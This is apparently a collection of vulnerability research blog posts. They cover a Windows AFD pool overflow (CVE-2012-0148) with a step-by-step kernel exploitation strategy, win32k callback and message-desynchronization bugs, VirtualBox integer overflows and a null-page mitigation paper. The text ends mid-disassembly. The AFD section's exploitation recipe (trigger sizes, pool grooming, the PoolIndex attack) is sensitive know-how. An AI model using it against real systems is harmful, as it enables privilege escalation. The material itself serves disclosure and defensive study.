CVE-2012-0148: A Deep Dive Into AFD

This week, Microsoft addressed two vulnerabilities in the Ancillary Function Driver (AFD) that could allow non-privileged users to elevate their privileges to SYSTEM. In this blog entry, we look at one of the patched vulnerabilities and demonstrate practical exploitability against x64 Windows 7 using the techniques presented at INFILTRATE 2011 on modern kernel pool exploitation.

Introduction

The Ancillary Function Driver (AFD) is the kernel management layer of the Windows Sockets interface. As with many other popular operating systems, Windows and AFD manages network connection endpoints as sockets. The socket paradigm was adapted for Windows in Windows Sockets 1.1, and supported the most basic functionality traditionally found in BSD. The main goal behind this design was to make it easy for Unix developers to port their existing network aware applications to the Windows platform. Microsoft later introduced the Windows Sockets 2 architecture, compliant with the Windows Open System Architecture. Winsock 2.0 defines a standard service provider between the application programming interface (API), with its functions exported from WS2_32.dll and the protocol stacks. This allows Winsock 2.0 to support multiple transport protocols, whereas Winsock 1.1 is limited to TCP/IP only. Over the Winsock standard, Windows also includes additional extensions to primarily enhance performance (e.g. TransmitFile) and conserve use of memory and processing such as in providing the ability to reuse sockets (e.g. supported by ConnectEx and AcceptEx).

Winsock Architecture

The Winsock architecture is divided into a user-mode and kernel-mode layer. At the highest level, applications interact with the Windows Sockets API (ws2_32.dll), which offer familiar functions such as bind, listen, send, and recv. These functions call into a suitable provider, either defined by the system or by an application. For instance, VMCI sockets can be used by VMware virtual machines to communicate with other virtual machines. Here, the VMCI provider (installed by VMware Tools) calls in to the VMCI socket library (vsocklib.dll) which then calls into the VMCI driver (vmci.sys) responsible for managing and calling out to the host/other virtual machines. Similarly, Windows registers a provider for the Winsock API (mswsock.dll) for its natively supported protocols such as TCP and UDP. Winsock then operates through the Ancillary Function Driver (afd.sys) to perform the necessary socket management and callouts to TCP/IP.

Although the networking architecture in Windows changed notably in Windows Vista, the way applications interact with the Windows Sockets API and their interaction with AFD remains largely the same.

Winsock Architecture

Socket Management

The Ancillary Function Driver, or afd.sys, is responsible for creating and managing socket endpoints in Windows. Internally, Windows represents a socket as a file object, with additional attributes defined to keep track of state information such as whether a connection has been established or not. This allows applications to use standard read and write APIs on socket handles to access and transmit network data.

When AFD is first initialized, it creates the AFD device (in turn accessed by Winsock applications) and sets up the associated driver object IRP handlers.  When an application first creates a socket, the IRP_MJ_CREATE routine (afd!AfdCreate) is called to allocate an endpoint data structure (afd!AfdAllocateEndpoint). This is an opaque structure that defines every unique attribute of each endpoint as well as the state it is in (e.g. whether it is connecting, listening, or closing). AFD functions operating on the endpoint structure (e.g. the send and receive functions) will typically validate the endpoint state before proceeding. Additionally, a pointer to the endpoint data structure itself is stored in the FsContext field of the socket file object such that AFD can easily locate the socket management data. AFD also keeps track of all endpoints through a doubly linked list (afd!AfdEndpointsList), such as for determining whether an address has already been bound.

The majority of the functionality found within AFD is accessed through the device I/O control handler. AFD also provides fast device I/O control routines in order to service requests which can be satisfied directly from the cache manager and don’t require an IRP to be generated. AFD will attempt to use the fast I/O dispatch routines whenever possible, particularly when reading and writing network data. However, in some situations where more extensive processing is needed, it will fall back to the regular IRP-based mechanism. An example of this is whenever the size of a datagram exceeds 2048 bytes, or when a connection (endpoint) isn’t in the expected state.

When looking at functions in AFD, particularly those called by the dispatch I/O control routine, it is important to pay attention to the validation being made immediately to the request. In fact, looking over most functions in AFD, one may repeatedly notice validation (compares) against constants such as 0xAFD0, 0xAFD1, 0xAFD2, and so on. These are constants describing the state of the active socket endpoint/connection and are stored in the very first 16-bit field of the endpoint data structure. For instance, 0xAFD1 indicates an endpoint representing a datagram socket while 0xAFD0, 0xAFD2, 0xAFD4, and 0xAFD6 indicate endpoints representing TCP sockets in various states.

AFD!AfdPoll Integer Overflow Vulnerability (CVE-2012-0148)

The Windows Sockets API allows applications to query the status of one or more sockets through the select function. These requests are handled internally by the AFD.SYS driver in the afd!AfdPoll function (internally calls afd!AfdPoll32 or afd!AfdPoll64 depending on the process that made the I/O request), and are processed whenever the AFD device is issued the 0×12024 I/O control code. This function processes a user-supplied poll information (AFD_POLL_INFO) buffer that contains all the records (AFD_HANDLE) for the sockets to query. The definitions of these structures are listed below (based on ReactOS).

typedef struct _AFD_HANDLE_ {
    SOCKET                              Handle;
    ULONG                               Events;
    NTSTATUS                            Status;
} AFD_HANDLE, *PAFD_HANDLE;

typedef struct _AFD_POLL_INFO {
    LARGE_INTEGER                       Timeout;
    ULONG                               HandleCount;
    ULONG                               Exclusive;
    AFD_HANDLE                          Handles[1];
} AFD_POLL_INFO, *PAFD_POLL_INFO;

Upon receiving this data, AFD calls afd!AfdPollGetInfo to allocate a second buffer (from the non-paged pool) to aid in storing information returned as the individual sockets are queried. Specifically, each AFD_HANDLE record is denoted its own AFD_POLL_ENTRY record in this internal buffer structure (which we call AFD_POLL_INTERNAL).We describe these opaque structures as follows.

typedef struct _AFD_POLL_ENTRY {
    PVOID                               PollInfo;
    PAFD_POLL_ENTRY                     PollEntry;
    PVOID                               pSocket;
    HANDLE                              hSocket;
    ULONG                               Events;
} AFD_POLL_ENTRY, *PAFD_POLL_ENTRY;

typedef struct _AFD_POLL_INTERNAL {
    CHAR                                Unknown[0xB8];
    AFD_POLL_ENTRY                      PollEntry[1];
} AFD_POLL_INTERNAL, *PAFD_POLL_INTERNAL;

Before processing the user-supplied buffer (AFD_POLL_INFO) to query each individual socket, afd!AfdPoll ensures that the buffer is large enough to fit the number of records indicated by the HandleCount value. If the size is too small, the function returns with an insufficient size error. While this prevents user-mode code from passing bogus HandleCount values, it does not account for the fact that the size of the records allocated internally by the AfdPoll function exceeds that of the provided poll information buffer. For instance, on Windows 7 x64 the size of an AFD_HANDLE entry is 0×10 bytes, while the size of the corresponding entry allocated internally (AFD_POLL_ENTRY) is 0×28. An additional 0xB8 bytes is also added to store metadata used internally by the poll function. With enough entries, this difference may lead to a condition where AFD sufficiently validates the poll information buffer passed in from user-mode, but triggers an integer overflow when calculating the size of the internal buffer.

Integer Overflow in AfdPoll64

Once the function proceeds to query each individual socket and fill in their respective AFD_POLL_ENTRY records of the undersized buffer, a pool overflow occurs as the original HandleCount value is used to determine the number of records to be processed.

Exploitability

The security impact of a vulnerability is in many ways tied to its exploitability. In order to assess the exploitability of the described vulnerability, we need to understand both the conditions under which the vulnerability is triggered as well as how the affected module interacts with system components such as the kernel pool allocator.

In order to trigger the vulnerability, we first need to allocate enough memory to ensure that the multiplication/constant addition results in an integer overflow. This is because AFD internally validates the size of the user provided buffer by dividing it by the size of each record (AFD_HANDLE) to see if the supplied count (HandleCount) is consistent. On x64 (Win7), 0×6666662 elements are enough to cause a wrap, meaning that a user-mode buffer of size 0×10 + (0×6666662 * 0×10) is required to be passed to the driver. This translates to 1638MB which furthermore needs to be cached in an internal kernel buffer by the I/O manager as the affected IOCTL uses METHOD_BUFFERED. On x86 (Win7), a user-mode buffer of size 0×99999970 (((0×100000000 – 0×68 / 0×14) * 0xC) – 0×10) has to be allocated. As this is only feasible in /3GB configurations, and the kernel needs an equivalent amount of memory to be cached, we don’t consider this vulnerability to be practically exploitable on 32-bit systems.

As the vulnerability results in an out-of-bounds copy to an undersized pool allocation, sufficient knowledge about the pool allocator and its inner workings is also needed. When dealing with pool overflows, one of the most important questions that comes up is whether the attacker is able to limit the number of elements that are written outside the allocated buffer. As the kernel pool is used globally by the system, any memory corruption could potentially affect system stability. In the most frequent case, the vulnerable code will use the count value that was initially used to cause the integer overflow and thus copy elements until an invalid page is hit either in the source or destination buffer. As both buffers are allocated in kernel-mode (METHOD_BUFFERED has already cached the user provided buffer), we cannot rely on unmapped pages to terminate the copy if say the buffer was passed in directly from user-mode. However, there are also cases where validation is enforced on each copied element, which may allow the attacker to terminate the copy arbitrarily (e.g. see the vulnerabilities discussed in “Kernel Pool Exploitation on Windows 7”).

In the vulnerable function, AFD copies the user-supplied AFD_POLL_INFO structure to an internal and potentially undersized buffer allocation. This internal structure is later on processed by the same function when querying the status of each individual socket. Before each AFD_HANDLE entry (embedded by the AFD_POLL_INFO structure) is copied to the internal buffer, afd!AfdPoll64 calls ObReferenceObjectByHandle to validate the socket handle and retrieve the backing file object of each respective entry. If the validation fails, the function terminates the copy operation and ignores the remaining entries. In the context of exploitation, this becomes very valuable as we can terminate the pool overflow at the granularity of the size of an internal record structure (sizeof(AFD_POLL_ENTRY)).

Socket Handle Validation

At this point, we know that we can limit the overflow at 0×28 boundaries. We also know that we can overflow the size of the internal buffer structure because we control n in size = 0xB8 + (n * 0×28). The next task then becomes to find a suitable target of the overflow. For this particular bug, we leverage the PoolIndex attack as described in “Kernel Pool Exploitation on Windows 7”, and overflow the pool header of the next pool allocation. In order to do this reliably, we have to do two things.

  1. Manipulate the kernel pool such that reliable and predictable overwrites can be achieved.
  2. Find a suitable size to allocate such that we overflow just enough bytes to corrupt the adjacent pool header.

Finding the desired size essentially depends on the allocation primitives we have at our disposal. Since the pool overflow is in the non-paged pool, we ideally want to use APIs that allow us to allocate and free memory arbitrarily from this resource. One possibility here is the use of NT objects. In fact, the worker factory object (created in NtCreateWorkerFactory) is of particular interest to us because on our target platform (Windows 7 x64), the size of this object is 0×100 bytes (0×110 including the pool header). By providing the AfdPoll64 function with an AFD_POLL_INFO structure and a HandleCount value of 0×6666668, we can cause the size of the internal buffer allocation to overflow and result in a 0xF8 byte allocation. When rounded up to the nearest block size by the pool allocator, the internal buffer will be 0×100, the same size as the worker factory object. This way, we can manipulate chunks of 0×100 bytes in order to position the buffer allocated by AFD to be positioned next to a chunk that we control.

When we trigger the overflow, we copy only two chunks to the internal buffer structure. We do this by providing an invalid socket handle as the third AFD_HANDLE entry. The first record is copied to offset 0xB8 of the internal buffer (whose size is now 0×100), while the second record begins at 0xE0. Because each AFD_POLL_ENTRY record is actually 0×24 bytes in size (padded to 0×28 for alignment), we overflow 4 bytes into the next pool allocation.  Specifically, we overflow into the pool header bits (nt!_POOL_HEADER), enough to mount the pool index attack. We fully control the first four bytes in the pool header because the Events value (ULONG) in the AFD_HANDLE structure is copied to offset 0×20 in the AFD_POLL_ENTRY record.

Pool Overflow

When mounting the pool index attack, we leverage the fact that the pool allocator in Windows does not validate the pool index upon freeing a pool chunk. Windows uses the pool index to look up the pointer to the pool descriptor to which it returns the freed memory block. We can therefore reference an out-of-bounds pointer (null) and map the null page to fully control the pool descriptor. By controlling the pool descriptor, we also control the delayed free list, a list of pool chunks waiting to be freed. If we furthermore indicate that the delayed free list is full (0×20 entries), it is immediately processed upon the free to our crafted pool descriptor, hence we are able to free an arbitrary address to a fully controlled linked list. In short, this means that we are able to write any given controllable address to an arbitrary location. From here, we can overwrite the popular nt!HalDispatchTable entry or any other function pointer called from ring 0.

Update (2012-02-18): Thanks to @fdfalcon for pointing out a miscalculation regarding the memory usage on x64.

Windows Hooks of Death: Kernel Attacks through User-Mode Callbacks

At Black Hat USA 2011, I presented the research that lead up to the 44 vulnerabilities addressed in MS11-034 and MS11-054. These vulnerabilities were indirectly introduced by the user-mode callback mechanism which win32k relies upon to interact with data stored in user-mode as well as provide applications the ability to instantiate windows and event hooks. In invoking a user-mode callback, win32k releases the global lock it aquires whenever making updates to data structures and objects managed by the Window Manager (USER). In doing so, applications are free to modify the state of management structures as well as user objects by invoking system calls from within the callback itself. Thus, upon returning from a user-mode callback, win32k must perform extensive validation in order to make sure that any changes are accounted for. Failing to properly validate such changes could result in vulnerabilities such as null-pointer derferences and use-after-frees.

The slide deck for the Black Hat presentation as well as the accompanied whitepaper, outlines several of the vulnerabilities that may arise from the lack of user-mode callback validation. In particular, we look at the importance of user object locking, validating object and data structure state changes, and ensuring that reallocatable buffers are sufficiently validated. In order to assess the severity of the mentioned vulnerabilities, we also investigate their exploitability and with that, show how an attacker very easily (e.g. using kernel pool or heap manipulation) could obtain arbitrary kernel code execution. Finally, because vulnerability classes such as use-after-frees and null-pointer dereferences have been (and still are?) extremely prevalent in win32k, we conclude by evaluating ways to mitigate their exploitability.

In retrospect, Black Hat USA and DEFCON stands out as one of those great conferences where you get to meet many interesting people and can run into just about anyone. Having spent what now seems like a lifetime in win32k (ok, I may be loosely exaggerating…), meeting one of the past developers of the Window Manager whose code I had torn to pieces (sorry!), was one of those great moments that will be remembered for years to come. I also want to use this occasion to extend my gratitude and thanks to everybody that showed up for my talk. Your feedback is highly appreciated, and I would probably not have been doing this if it wasn’t for you guys. See you on the flipside!

Oracle VirtualBox Integer Overflow Vulnerabilities

In VirtualBox 4.0.10 and the Critical Patch Update for July 2011, Oracle addressed two vulnerabilities that could be leveraged by an attacker to gain elevated privileges in a Windows guest (CVE-2011-2300) or execute arbitrary code on the host (CVE-2011-2305). The former affected the VirtualBox XPDM display driver, installed on Windows guests as part of the VirtualBox Guest Additions, while the latter was a vulnerability in the VirtualBox 3D graphics stack, resulting in host memory corruption. Before we look closer at the details of these vulnerabilities, we’ll briefly review the Windows 2000/XP display driver architecture.

Windows 2000/XP Display Driver Model

In the XPDM architecture, every graphics adapter is associated with a display driver and a corresponding miniport driver. The display driver is essentially a DLL whose primary responsibility is rendering. It is written for any number of adapters that share a common drawing interface and hooks drawing operations offered by GDI (win32k) to enhance performance. The display driver also has direct access to video hardware registers for time-critical operations.

XP Display Driver Model Architecture

The video miniport driver generally interacts with other NT kernel components as is written specifically for one adapter (or family of adapters). It manages all the resources shared between the video miniport driver and the display driver, and handles hardware initialization, mode sets, and physical device memory mapping. Notably, the video miniport driver can only make calls exported by videoprt.sys. In order to request support from the video miniport driver, the display driver calls EngDeviceIoControl with a control code specific to the desired operation.

A display driver may implement a number of different graphics DDI functions depending on the drawing operations to accelerate or features to support. In general, DDI functions are grouped into three categories: functions required by every display driver, functions required under certain conditions, and functions that are optional. The functions implemented and supported by a display driver are defined by DrvEnableDriver (DriverEntry), whose prototype is shown below.

BOOL DrvEnableDriver(
    ULONG iEngineVersion,
    ULONG cj,
    __in  DRVENABLEDATA *pded
);

Upon loading the driver, the OS sets the iEngineVersion according to the version of GDI that is currently running (e.g. Windows 2000 or XP). The display driver then fills the DRVENABLEDATA structure accordingly with the supported interfaces. Subsequently, upon making GDI and DirectX calls, win32k.sys and dxg.sys call the corresponding function in the display driver.

DrvEnableDriver Example

Because the XPDM display driver model requires vendors to marshal great amounts of data in kernel-mode in handling large and complex Direct3D/DirectDraw structures, there is a significant probability of security vulnerabilities being present. It should be noted that the newer Windows Vista Display Driver Model (WDDM) tries to address this by moving such processing into a user-mode driver. In the event that GDI does not offer a suitable interface for say some specific graphics adapter capability, XPDM allows developers to use generic Escape calls. This enables user-mode applications to instruct the display driver to exercise specific functionality, much like the DeviceIoControl interface does in regular kernel-mode drivers. It is no secret that such interfaces should be carefully audited as they directly operate on user provided data and thus become a prime candidate for privilege escalation vulnerabilities.

XPDM Display Driver Integer Overflow Vulnerability

The XPDM display driver in VirtualBox implements the DrvEscape interface to provide information about the mode of operation, but more importantly the ability to set the visible region of a guest’s display. This is done by making a VBOXESC_SETVISIBLEREGION escape call (e.g. via ExtEscape) with a RGNDATA formatted buffer holding the array of rectangles that compose the region. The display driver copies this information to a buffer of its own before sending the information to the host.

[trunk/src/VBox/Additions/WINNT/Graphics/Video/disp/xpdm/VBoxDispDriver.cpp]

        case VBOXESC_SETVISIBLEREGION:
        {
            LOGF(("VBOXESC_SETVISIBLEREGION"));
            LPRGNDATA lpRgnData = (LPRGNDATA)pvIn;

            if (cjIn >= sizeof(RGNDATAHEADER)
                &&  pvIn
                &&  lpRgnData->rdh.dwSize == sizeof(RGNDATAHEADER)
                &&  lpRgnData->rdh.iType  == RDH_RECTANGLES
                &&  cjIn == lpRgnData->rdh.nCount * sizeof(RECT) + sizeof(RGNDATAHEADER))
            {
                DWORD   i;
                PRTRECT pRTRect;
                int     rc;
                RECT   *pRect = (RECT *)&lpRgnData->Buffer;

                pRTRect = (PRTRECT) EngAllocMem(0, lpRgnData->rdh.nCount*sizeof(RTRECT), MEM_ALLOC_TAG);
                if (!pRTRect)
                {
                    WARN(("failed to allocate %d bytes", lpRgnData->rdh.nCount*sizeof(RTRECT)));
                    break;
                }

                for (i=0; i<lpRgnData->rdh.nCount; ++i)
                {
                    LOG(("New visible rectangle (%d,%d) (%d,%d)",
                         pRect[i].left, pRect[i].bottom, pRect[i].right, pRect[i].top));
                    pRTRect[i].xLeft   = pRect[i].left;
                    pRTRect[i].yBottom = pRect[i].bottom;
                    pRTRect[i].xRight  = pRect[i].right;
                    pRTRect[i].yTop    = pRect[i].top;
                }

The vulnerability addressed in VirtualBox 4.0.10 was an integer overflow in multiplying the number of rectangles (cRects) with the size of a RTRECT structure (equivalent to RECT), subsequently used to determine the size of the driver allocated buffer. This in turn resulted in a kernel pool overflow as the driver later used cRects in copying the rectangles. The latest maintenance release ensures that the multiplication does not wrap by casting sizeof(RECT) to an uint64_t and that the rectangle count does not exceed 1 million.

            if (    cjIn >= sizeof(RGNDATAHEADER)
                &&  pvIn
                &&  lpRgnData->rdh.dwSize == sizeof(RGNDATAHEADER)
                &&  lpRgnData->rdh.iType  == RDH_RECTANGLES
                &&  (cRects = lpRgnData->rdh.nCount) <= _1M
                &&  cjIn == cRects * (uint64_t)sizeof(RECT) + sizeof(RGNDATAHEADER))
            {

Although there’s a theoretical possibility of exploiting this vulnerability, the large copy makes it somewhat difficult. On MP systems, an attacker may be able to corrupt a kernel object or structure in the non-paged pool and trigger use of it before the copy reaches unmapped memory or triggers some other fault.

VBoxSharedOpenGL Host Service Integer Overflow Vulnerability

As current graphics adapters do not offer virtualization of resources, providers of virtualization solutions need to abstract the graphics rendering in guests in order to offer the same 2D/3D experience you get on native systems. In VMware Workstation and Player, 3D rendering is performed by buffering commands in a shared memory between the guest and the host which the host processes and translates to OpenGL or Direct3D calls. VirtualBox takes a similar approach and uses Chromium to forward graphics calls from the guest system to the host where they are executed with hardware acceleration.

In the Host-Guest Communication Manager (HGCM), VirtualBox provides the VBoxSharedOpenGL service to give guest applications more direct control of commands passed to the host. Guest applications connect to the VBoxSharedOpenGL service by opening the VBoxGuest device and using the VBOXGUEST_IOCTL_HGCM_CONNECT I/O control code. Subsequent commands are then passed by issuing HGCM calls (VBOXGUEST_IOCTL_HGCM_CALL) and specifying the service command to execute. One of the service commands (SHCRGL_GUEST_FN_WRITE_BUFFER) processed by the host service was found vulnerable to an integer overflow. The affected code is shown below.

[trunk/src/VBox/HostServices/SharedOpenGL/crserver/crservice.cpp]

        case SHCRGL_GUEST_FN_WRITE_BUFFER:
        {
            Log(("svcCall: SHCRGL_GUEST_FN_WRITE_BUFFER\n"));
            /* Verify parameter count and types. */
            if (cParms != SHCRGL_CPARMS_WRITE_BUFFER)
            {
                rc = VERR_INVALID_PARAMETER;
            }
            else
            if (   paParms[0].type != VBOX_HGCM_SVC_PARM_32BIT /*iBufferID*/
                || paParms[1].type != VBOX_HGCM_SVC_PARM_32BIT /*cbBufferSize*/
                || paParms[2].type != VBOX_HGCM_SVC_PARM_32BIT /*ui32Offset*/
                || paParms[3].type != VBOX_HGCM_SVC_PARM_PTR   /*pBuffer*/
               )
            {
                rc = VERR_INVALID_PARAMETER;
            }
            else
            {
                /* Fetch parameters. */
                uint32_t iBuffer      = paParms[0].u.uint32;
                uint32_t cbBufferSize = paParms[1].u.uint32;
                uint32_t ui32Offset   = paParms[2].u.uint32;
                uint8_t *pBuffer      = (uint8_t *)paParms[3].u.pointer.addr;
                uint32_t cbBuffer     = paParms[3].u.pointer.size;

                /* Execute the function. */
                CRVBOXSVCBUFFER_t *pSvcBuffer = svcGetBuffer(iBuffer, cbBufferSize);
                if (!pSvcBuffer || ui32Offset+cbBuffer>cbBufferSize)
                {
                    rc = VERR_INVALID_PARAMETER;
                }
                else
                {
                    memcpy((void*)((uintptr_t)pSvcBuffer->pData+ui32Offset), pBuffer, cbBuffer);

                    /* Return the buffer id */
                    paParms[0].u.uint32 = pSvcBuffer->uiId;
                }
            }

            break;
        }

In the above code, the VBoxSharedOpenGL service does not sufficiently validate the ui32Offset parameter used in specifying the offset into a host managed buffer. If ui32Offset+cbBuffer results in a wrapped integer, the function may attempt to copy the contents of the guest supplied data at a negative offset from the allocated buffer on x86 hosts (and thus corrupting the preceding memory), or at a positive unvalidated buffer offset (+ui32Offset) on x64 systems. In order to fix this, ui32Offset was cast to uint64_t.

Naturally, exploitability in this case depends on the memory allocator of the host operating system. Writing at a negative offset allows the attacker to corrupt the memory of any preceding memory allocation and may allow for arbitrary code execution if the attacker can sufficiently influence the heap state of the host process. On 64-bit hosts, the attacker may pass a very large pBuffer (cbBuffer) and thus require a small ui32Offset to pass the overflow check. This would allow the attacker to corrupt subsequently positioned memory blocks in the host process.

In attempting to exploit vulnerabilities in virtualized devices such as in a guest-to-host escape scenario, an attacker is typically required to install a driver (to do raw I/O operations or manipulate device memory directly) or perform other tasks that require administrative privileges. In this particular case, no special privileges are required as the vulnerability is triggered through the VirtualBox guest device which permits unprivileged access. Although Oracle admits that the Chromium stack (not enabled by default) may open VirtualBox to security vulnerabilities, the affected component is not directly related to Chromium.

Mitigating Null Pointer Exploitation on Windows

As part of a small research project, I recently looked into how exploitation of null pointer vulnerabilities could be mitigated on Windows. The problem with many of the recent vulnerabilities affecting Windows kernel components is that a large number of these issues can be exploited provided that the attacker maps and controls the contents of the null page. As many of you probably know, Windows allows non-privileged users to map the null page through functions such as NtAllocateVirtualMemory or NtMapViewOfFile.

Although there are multiple ways to approach the problem, the solution proposed relies on manipulation of virtual address descriptors (VADs) using a kernel-mode driver. As VADs are used to implement the PAGE_NOACCESS protection in Windows and contain special properties to secure address ranges in process memory, they can be used to deny null page access in both user and kernel space. The following paper details the proposed mitigation and suggests a possible implementation.

Locking Down the Windows Kernel: Mitigating Null Pointer Exploitation [PDF]

Abstract. One of the most prevalent bug classes affecting Windows kernel components today is undeniably NULL pointer dereferences. Unlike other platforms such as Linux, Windows (in staying true to backwards compatibility) allows non-privileged users to map the null page within the context of a user process. As kernel and user-mode components share the same virtual address space, an attacker may potentially be able to exploit kernel null dereference vulnerabilities by controlling the dereferenced data. In this paper, we propose a way to generically mitigate NULL pointer exploitation on Windows by restricting access to the lower portion of process memory using VAD manipulation. Importantly, as the proposed method employs features already present in the memory manager and does not introduce any offending hooks, it can be introduced on a wide range of Windows platforms. Additionally, because the mitigation only introduces minor changes at process creation-time, the performance cost is minimal.

Thread Desynchronization Issues in Windows Message Handling

This week, Microsoft issued MS11-012 to resolve yet another batch of vulnerabilities in win32k.sys. The bulletin addressed three elevation of privilege vulnerabilities in window class data handling (somewhat related to those patched in MS10-073) and an additional two in window message handling. The latter were quite interesting as they were not your typical vulnerability class, but rather subtle issues caused by the desynchronization of threads engaged in synchronous messaging (using SendMessage APIs). In this post, we’ll review some of the internals concerning window messages and detail the issues at hand.

Past Vulnerabilities

Besides additions such as User Interface Privilege Isolation (UIPI) in Vista [1] and touch and gesture support in Windows 7, the core messaging components have undergone little change over the years. In spite of this, vulnerabilities continue to be discovered. In MS08-025, several data validation vulnerabilities related to user-mode callbacks in the system message handlers were addressed [2]. MS10-098 also fixed a validation issue introduced in Windows 7 upon processing WM_GETTEXT messages that could be leveraged to corrupt the memory of a privileged process. Moreover, additional denial of service vulnerabilities have been reported in system message handlers such as SfnINSTRING and SfnLOGONNOTIFY.

Windows Messages

Windows-based applications are event driven and act upon messages sent to them. Thus, messages and the mechanisms that support them have always played an integral role in the user interface component of the Windows operating system. Each window, owned by a thread, has a window procedure (function) for processing input messages and dispatching them to the operating system. If a thread accesses any of the user interface or GDI system calls (handled by win32k.sys), the kernel creates a THREADINFO structure which holds three message queues used to process input. These are the input queue, the post queue, and the send queue. The input queue is primarily used for mouse and keyboard messages, while the send and post queues are used for synchronous (send) and asynchronous (post) window messages respectively.

typedef struct _tagTHREADINFO           // 156 elements, 0x208 bytes (sizeof)
{

/*0x0BC*/     struct _tagQ* pq;					// input queue

/*0x0E0*/     struct _tagSMS* psmsSent;			// send queue (sent)
/*0x0E4*/     struct _tagSMS* psmsCurrent;		// send queue (current)
/*0x0E8*/     struct _tagSMS* psmsReceiveList;	// send queue (received)

/*0x174*/     struct _tagMLIST mlPost;			// post queue

} tagTHREADINFO, *PtagTHREADINFO;

Asynchronous Messages

Asynchronous messages are used in one-way communication between window threads and are typically used to notify a window to perform a specific task. Asynchronous messages are handled by the PostMessage APIs and are sent to the post queue of the receiving thread. The sender does not wait for the processing to complete in the receiving thread and thus returns immediately. For this reason, asynchronous messages cannot be used with pointers and handles as there is no guarantee that the sender will exist by the time the receiver processes the data.

Synchronous Messages

Synchronous messages differ from asynchronous messages as the sender typically waits for a response to be provided or a timeout to occur before continuing execution. Thus, they require mechanisms to ensure that the threads are properly synchronized and in the expected state. Synchronous messages use the SendMessage APIs which in turn direct execution to the NtUserMessageCall system call in win32k.sys.

NTSTATUS NtUserMessageCall (
	HWND hWnd,				// target window
	UINT Msg,				// message type
	WPARAM wParam,			// param1
	LPARAM lParam,			// param2
	ULONG_PTR ResultInfo,	// param3
	DWORD dwType,			// window procedure
	BOOL bAnsi )			// ansi/unicode

The message type (Msg) is identified by a unique WM code such as WM_SETFOCUS, WM_CREATE, WM_ENABLE, etc. Applications may define their own message codes, but those less than WM_USER (0×400) are reserved by the operating system. Each reserved code denotes an index into win32k!MessageTable (byte array) in which the lower 6 bits of each byte entry defines the identifier (array index) of the associated system message handlers (discussed in the next section).

kd> db win32k!MessageTable
822a42c8  00 c2 00 00 00 00 00 00-00 00 00 00 c3 c4 ec 00  ................
822a42d8  00 00 00 00 80 00 00 00-00 00 c3 c5 00 00 00 00  ................
822a42e8  00 00 00 00 86 00 00 80-00 00 00 87 88 89 00 4a  ...............J
822a42f8  00 80 00 00 00 00 00 00-8b 8c 29 00 a9 00 00 00  ..........).....
822a4308  00 00 00 00 00 00 8d 8e-00 cf 90 00 00 00 00 00  ................
822a4318  00 00 00 91 00 00 00 00-00 00 00 00 00 00 00 00  ................
822a4328  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
822a4338  a9 00 00 00 00 00 00 00-00 00 00 00 92 92 00 00  ................

Inter-thread messages are stored in a send message structure (win32k!tagSMS) and appended to the send queue of the receiving thread. The buffer for this structure is allocated in win32k!AllocSMS upon initiating inter-thread messaging in win32k!xxxInterSendMsgEx. The SMS structure holds all the message parameters and information about the sending and receiving threads. The structure is defined as follows (from the Windows 7 public symbols).

typedef struct _tagSMS                      // 15 elements, 0x3C bytes (sizeof)
{
/*0x000*/     struct _tagSMS* psmsNext;
/*0x004*/     struct _tagSMS* psmsReceiveNext;
/*0x008*/     struct _tagTHREADINFO* ptiSender;
/*0x00C*/     struct _tagTHREADINFO* ptiReceiver;
/*0x010*/     FUNCT_00A4_1106_lpResultCallBack* lpResultCallBack;
/*0x014*/     ULONG32      dwData;
/*0x018*/     struct _tagTHREADINFO* ptiCallBackSender;
/*0x01C*/     LONG32       lRet;
/*0x020*/     ULONG32      tSent;
/*0x024*/     UINT32       flags;
/*0x028*/     UINT32       wParam;
/*0x02C*/     LONG32       lParam;
/*0x030*/     UINT32       message;
/*0x034*/     struct _tagWND* spwnd;
/*0x038*/     VOID*        pvCapture;
} tagSMS, *PtagSMS;

Client and Server Functions

The function id stored in the message table denotes an index into a client (gapfnMessageCall) or server (gapfnScSendMessage) function table. The client functions are used by threads sending a message while the server functions are used by threads processing a message. The client functions (prefixed by NtUserfn) are mostly used for probing and caching (copying to kernel memory) of user-mode data. Server functions (prefixed by Sfn) parse and process the content of the message and, if necessary, return data to the sending thread. The following tables show the first few functions of the client and server function tables as found in the data section of win32k.sys.

.rdata:BF9F30C8 _gapfnScSendMessage dd offset _SfnDWORD@32
.rdata:BF9F30CC                 dd offset _SfnNCDESTROY@32
.rdata:BF9F30D0                 dd offset _SfnINLPCREATESTRUCT@32
.rdata:BF9F30D4                 dd offset _SfnINSTRINGNULL@32
.rdata:BF9F30D8                 dd offset _SfnOUTSTRING@32
.rdata:BF9F30DC                 dd offset _SfnINSTRING@32
.rdata:BF9F30E0                 dd offset _SfnINOUTLPPOINT5@32
.rdata:BF9F31C8 _gapfnMessageCall dd offset _NtUserfnNCDESTROY@28
.rdata:BF9F31CC                 dd offset _NtUserfnNCDESTROY@28
.rdata:BF9F31D0                 dd offset _NtUserfnINLPCREATESTRUCT@28
.rdata:BF9F31D4                 dd offset _NtUserfnINSTRINGNULL@28
.rdata:BF9F31D8                 dd offset _NtUserfnOUTSTRING@28
.rdata:BF9F31DC                 dd offset _NtUserfnINSTRING@28
.rdata:BF9F31E0                 dd offset _NtUserfnINOUTLPPOINT5@28

In sending a WM_CREATE (0×1), the sending thread looks up the associated function id in win32k!MessageTable and calls gapfnMessageCall[0x2] = NtUserfnINLPCREATESTRUCT. This function probes and caches the user-mode values before it is sent off in win32k!xxxInterSendMessage and the receiving thread processes the message in gapfnScSendMessage[0x2] = SfnINLPCREATESTRUCT.

SendMessage/GetMessage Execution Flow

In order for send messages to function as intended, the kernel must implement mechanisms to ensure that the sending and receiving threads are synchronized. This is important as message parameters/variables can be stored on the kernel stack of the sending thread, and updates made to this thread stack must be done in a controlled manner. To ensure that either thread has not unexpectedly terminated, the send message kernel structure employs a flags field to keep track of the state of both threads. For instance, if a thread terminates, win32k!xxxDestroyThreadInfo calls win32k!SendMsgCleanup to update the flags field of the SMS structure accordingly. This field must be checked explicitly before updating any values in the stack of the opposite thread.

Thread Desynchronization Vulnerabilities

Several server functions (win32k!Sfn*) did not properly validate the state of the sender thread (client) before returning data to the sender’s thread stack. Consequently, the receiver thread could write to memory that had been freed or even worse, write to a desynchronized kernel thread stack. The latter could result in arbitrary kernel code execution, for instance in overwriting the return pointer of a stack frame. In win32k!SfnINLPDRAWITEMSTRUCT, we see that the device context value on the client thread stack (ESI) is updated without performing the necessary state checks.

.text:BF93A9FC    mov     edi, [ebp+hdcOriginal]
.text:BF93A9FF    test    edi, edi
